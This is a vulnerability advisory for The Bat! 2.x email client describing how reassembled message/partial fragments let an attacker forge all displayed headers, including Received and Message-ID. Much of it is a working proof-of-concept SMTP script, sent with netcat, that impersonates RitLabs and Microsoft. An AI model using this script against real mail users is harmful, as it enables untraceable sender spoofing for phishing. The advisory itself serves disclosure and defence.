thebatSpoof.txt

`  
Title: The Bat! 2.x message headers spoofing  
Author: 3APA3A <[email protected]>  
Homepage: http://www.security.nnov.ru/  
Advisory URL: http://www.security.nnov.ru/advisories/thebatspoof.asp  
Vendor: RitLabs  
Vendor's page http://thebat.net/  
Application: The Bat 2.x (2.12.04 tested)  
Not vulnerable: The Bat! 3.5  
Remote: Yes, against client  
Category: Information spoofing  
  
Intro:  
  
The Bat! is very convenient, powerful and secure (comparing with  
others) MUA (Mail User Agent) with many professional features:  
templates, macroses, Bayesian SPAM filter, etc. This is commercial  
product from RitLabs.  
  
Vulnerability:  
  
Design flow in the way The Bat! shows message/partial messages allow  
attacker to spoof RFC 822 headers or original message, including _all_  
Received: and Message-ID:. It makes it possible to create untrackable  
message and spoof message origin, including sender's network.  
  
Details:  
  
The Bat! silently re-assembles partial message and shows encapsulated  
data. The headers shown are ones of encapsulated message. Real headers  
are lost completely.  
  
Exploit:  
  
Replace @example.com with destination address  
nc ip_of_smtp_relay 25 <thebatexploit.txt  
  
  
-=-=-=-=- begin thebatexploit.txt -=-=-=-=-  
HELO example.com  
MAIL FROM: <[email protected]>  
RCPT TO: <[email protected]>  
DATA  
Date: Mon, 31 Jan 2006 13:30:00 +0300  
From: 3APA3A <[email protected]>  
X-Mailer: The Bat! (v2.12.00)  
Organization: http://www.security.nnov.ru/  
X-Priority: 3 (Normal)  
Message-ID: <[email protected]>  
To: Phiby <[email protected]>  
Subject: Subject: Re[7]: //  
Message-ID: <p#[email protected]@thebat.net>  
MIME-Version: 1.0  
Content-Type: message/partial; id="[email protected]@thebat.net";  
number=1; total=2  
  
Received: from mail.ritlabs.com (mail.ritlabs.com [198.63.208.135])  
by mail.example.com (Postfix) with ESMTP id 9F89619EBEB  
for <[email protected]>; Mon, 31 Jan 2006 13:30:06 +0300 (MSK)  
Date: Mon, 31 Jan 2006 13:30:06 +0300  
From: The Bat! developers <[email protected]>  
X-Mailer: The Bat! (v2.12.00)  
Organization: RitLabs  
X-Priority: 3 (Normal)  
Message-ID: <[email protected]>  
To: Phiby <[email protected]>  
Subject: Subject: Re[7]: //  
MIME-Version: 1.0  
Content-Type: text/plain; charset=Windows-1251  
Content-Transfer-Encoding: 8bit  
  
Dear Phiby,  
  
Best wishes for you and http://phiby.com/  
.  
RSET  
MAIL FROM: <[email protected]>  
RCPT TO: <[email protected]>  
DATA  
Date: Mon, 30 Jan 2006 13:30:06 +0300  
From: 3APA3A <[email protected]>  
Organization: http://www.security.nnov.ru/  
X-Mailer: The Bat! (v2.12.00)  
Organization: Microsoft  
X-Priority: 3 (Normal)  
Message-ID: <[email protected]>  
To: Phiby <[email protected]>  
Subject: Subject: Re[7]: //  
Message-ID: <p#[email protected]@microsof.com>  
MIME-Version: 1.0  
Content-Type: message/partial; id="[email protected]@thebat.net";  
number=2; total=2  
  
Yours, The Bat! develpment team.  
.  
QUIT  
-=-=-=-=- end thebatexploit.txt -=-=-=-=-  
  
Workaround:  
  
Do not trust data The Bat! shows in headers.  
  
Solution:  
  
Upgrade to The Bat! 3.x (not free)  
  
  
  
  
  
  
  
  
--   
http://www.security.nnov.ru  
/\_/\  
{ , . } |\  
+--oQQo->{ ^ }<-----+ \  
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)  
+-------------o66o--+ /  
|/  
  
  
`